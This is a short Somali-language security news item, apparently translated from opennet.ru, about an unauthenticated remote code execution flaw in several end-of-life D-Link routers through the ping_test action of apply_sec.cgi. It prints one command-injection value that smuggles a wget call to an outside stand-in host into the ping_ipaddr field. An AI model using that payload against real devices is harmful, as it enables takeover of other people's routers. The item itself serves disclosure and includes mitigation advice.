In D-Link router wireless nuglaansho halis ah (), kaas oo kuu ogolaanaya inaad meel fog ka sameyso koodka dhinaca qalabka adigoo u diraya codsi gaar ah "ping_test", oo la heli karo iyada oo aan la aqoonsanayn.
Waxa xiisaha lihi leh, marka loo eego soo-saareyaasha firmware-ka, wacitaanka βping_testβ waa in la fuliyaa oo keliya xaqiijinta ka dib, laakiin dhab ahaantii waxa loogu yeeraa kiis kasta, iyada oo aan loo eegin gelitaanka shabakadda shabakadda. Gaar ahaan, marka aad gelayso qoraalka apply_sec.cgi oo aad dhaafto βaction=ping_testβ meertada, qoraalku waxa uu u jiheeyaa bogga aqoonsiga, laakiin isla mar ahaantaana waxa uu fuliyaa ficilka la xidhiidha ping_test. Si loo fuliyo koodka, nuglaanta kale ayaa loo adeegsaday ping_test lafteeda, taas oo wacaysa utility ping iyada oo aan si sax ah loo hubin saxnaanta ciwaanka IP-ga ee loo soo diray tijaabada. Tusaale ahaan, si aad u wacdo utility wget oo aad u wareejiso natiijooyinka "echo 1234" amarka martigeliyaha dibadda, kaliya qeex qiyaasta "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Jiritaanka nuglaanta ayaa si rasmi ah loogu xaqiijiyay moodooyinka soo socda:
- DIR-655 leh firmware 3.02b05 ama ka weyn;
- DIR-866L leh firmware 1.03b04 ama ka weyn;
- DIR-1565 oo leh firmware 1.01 ama ka weyn;
- DIR-652 (ma jiraan macluumaad ku saabsan noocyada firmware dhibaato leh oo la bixiyay)
Wakhtiga taageerada moodooyinkan mar hore wuu dhacay, markaa D-Link , kaas oo aan sii deyn doonin cusbooneysiinta iyaga si ay u baabi'iyaan nuglaanshaha, kuma talinayo in la isticmaalo iyaga oo ku taliya in lagu beddelo qalab cusub. Sida ilaalinta amniga, waxaad xaddidi kartaa gelitaanka interneedka shabakadda ciwaannada IP ee la aamini karo oo keliya.
Markii dambe ayaa la ogaaday in baylahdu ay sidoo kale ahayd moodooyinka DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 iyo DIR-825, qorshayaasha lagu sii daayo updates kuwaas oo aan weli la ogaan.
Source: opennet.ru